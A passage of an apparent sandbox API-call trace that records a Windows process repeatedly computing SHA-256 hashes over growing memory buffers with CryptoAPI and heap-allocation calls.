[0175.968] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xd20, dwFlags=0x0) returned 1 [0175.968] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.968] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6add0 [0175.968] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6add0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6add0, pdwDataLen=0xcdfdc) returned 1 [0175.968] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.968] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0175.968] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822cd0) returned 1 [0175.968] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.968] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xd40, dwFlags=0x0) returned 1 [0175.969] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.969] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ac80 [0175.969] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6ac80, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6ac80, pdwDataLen=0xcdfdc) returned 1 [0175.969] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.969] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0175.969] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ed0) returned 1 [0175.969] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.969] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xd60, dwFlags=0x0) returned 1 [0175.969] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.969] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6afb0 [0175.969] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e6afb0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6afb0, pdwDataLen=0xcdfdc) returned 1 [0175.969] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.969] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0175.969] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823ad0) returned 1 [0175.970] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.970] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xd80, dwFlags=0x0) returned 1 [0175.970] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.970] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ad40 [0175.970] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6ad40, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6ad40, pdwDataLen=0xcdfdc) returned 1 [0175.970] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.970] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0175.970] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338225d0) returned 1 [0175.970] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.971] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xda0, dwFlags=0x0) returned 1 [0175.971] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.971] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b0a0 [0175.971] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6b0a0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6b0a0, pdwDataLen=0xcdfdc) returned 1 [0175.971] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.971] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0175.971] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ed0) returned 1 [0175.971] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.971] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xdc0, dwFlags=0x0) returned 1 [0175.971] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.971] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6afe0 [0175.971] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e6afe0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6afe0, pdwDataLen=0xcdfdc) returned 1 [0175.971] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.971] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0175.971] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338231d0) returned 1 [0175.972] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.972] CryptHashData (hHash=0x332b7ac0, pbData=0x32e5fa80, dwDataLen=0xde0, dwFlags=0x0) returned 1 [0175.972] CryptGetHashParam (in: hHash=0x332b7ac0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.972] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b250 [0175.972] CryptGetHashParam (in: hHash=0x332b7ac0, dwParam=0x2, pbData=0x32e6b250, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6b250, pdwDataLen=0xcdfdc) returned 1 [0175.972] CryptDestroyHash (hHash=0x332b7ac0) returned 1 [0175.972] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0175.972] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822dd0) returned 1 [0175.973] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.973] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xe00, dwFlags=0x0) returned 1 [0175.973] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.973] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b010 [0175.973] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6b010, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6b010, pdwDataLen=0xcdfdc) returned 1 [0175.973] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.973] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0175.973] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338235d0) returned 1 [0175.973] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.973] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xe20, dwFlags=0x0) returned 1 [0175.973] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.973] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ae00 [0175.973] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6ae00, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6ae00, pdwDataLen=0xcdfdc) returned 1 [0175.973] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.973] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0175.973] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338230d0) returned 1 [0175.974] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.974] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xe40, dwFlags=0x0) returned 1 [0175.974] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.974] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b6d0 [0175.974] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6b6d0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6b6d0, pdwDataLen=0xcdfdc) returned 1 [0175.974] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.974] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0175.974] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822fd0) returned 1 [0175.975] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.975] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xe60, dwFlags=0x0) returned 1 [0175.975] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.975] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ab90 [0175.975] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6ab90, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6ab90, pdwDataLen=0xcdfdc) returned 1 [0175.975] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.975] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0175.975] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338225d0) returned 1 [0175.975] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.975] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xe80, dwFlags=0x0) returned 1 [0175.975] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.975] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ae30 [0175.975] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e6ae30, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6ae30, pdwDataLen=0xcdfdc) returned 1 [0175.975] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.975] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0175.975] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338232d0) returned 1 [0175.976] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.976] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xea0, dwFlags=0x0) returned 1 [0175.976] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.976] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6abc0 [0175.976] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6abc0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6abc0, pdwDataLen=0xcdfdc) returned 1 [0175.976] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.976] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0175.976] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338225d0) returned 1 [0175.977] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.977] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xec0, dwFlags=0x0) returned 1 [0175.977] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.977] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b280 [0175.977] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e6b280, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6b280, pdwDataLen=0xcdfdc) returned 1 [0175.977] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.977] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0175.977] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821dd0) returned 1 [0175.977] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.977] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xee0, dwFlags=0x0) returned 1 [0175.977] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.977] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b520 [0175.977] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6b520, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6b520, pdwDataLen=0xcdfdc) returned 1 [0175.978] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.978] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0175.978] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338225d0) returned 1 [0175.978] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.978] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xf00, dwFlags=0x0) returned 1 [0175.978] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.978] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6aef0 [0175.978] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6aef0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6aef0, pdwDataLen=0xcdfdc) returned 1 [0175.978] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.978] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0175.978] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338228d0) returned 1 [0175.979] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.979] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xf20, dwFlags=0x0) returned 1 [0175.979] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.979] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b580 [0175.979] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6b580, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6b580, pdwDataLen=0xcdfdc) returned 1 [0175.979] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.979] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0175.979] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ad0) returned 1 [0175.979] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.979] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xf40, dwFlags=0x0) returned 1 [0175.979] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.979] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ace0 [0175.980] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6ace0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6ace0, pdwDataLen=0xcdfdc) returned 1 [0175.980] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.980] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0175.980] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338227d0) returned 1 [0175.980] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.980] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xf60, dwFlags=0x0) returned 1 [0175.980] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.980] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b040 [0175.980] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6b040, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6b040, pdwDataLen=0xcdfdc) returned 1 [0175.980] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.980] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0175.980] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338237d0) returned 1 [0175.981] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.981] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xf80, dwFlags=0x0) returned 1 [0175.981] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.981] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ad70 [0175.981] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6ad70, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6ad70, pdwDataLen=0xcdfdc) returned 1 [0175.981] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.981] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0175.981] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338236d0) returned 1 [0175.981] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.981] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xfa0, dwFlags=0x0) returned 1 [0175.981] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.981] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b430 [0175.982] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.982] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0175.982] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822bd0) returned 1 [0175.982] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.982] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xfc0, dwFlags=0x0) returned 1 [0175.982] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b640 [0175.982] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.982] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0175.982] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823bd0) returned 1 [0175.983] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.983] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xfe0, dwFlags=0x0) returned 1 [0175.983] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b700 [0175.983] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.983] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0175.983] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822fd0) returned 1 [0175.984] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.984] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x1000, dwFlags=0x0) returned 1 [0175.984] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b730 [0175.984] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.984] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0175.984] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5fa80 | out: hHeap=0x2150000) returned 1 [0175.984] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x1000) returned 0x32e5fa80 [0175.984] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338225d0) returned 1 [0175.984] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.984] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x20, dwFlags=0x0) returned 1 [0175.984] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b070 [0175.984] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.984] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0175.984] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338221d0) returned 1 [0175.985] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.985] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x40, dwFlags=0x0) returned 1 [0175.985] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ab60 [0175.985] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.985] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0175.985] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338232d0) returned 1 [0175.986] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.986] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x60, dwFlags=0x0) returned 1 [0175.986] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b670 [0175.986] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.986] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0175.986] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: 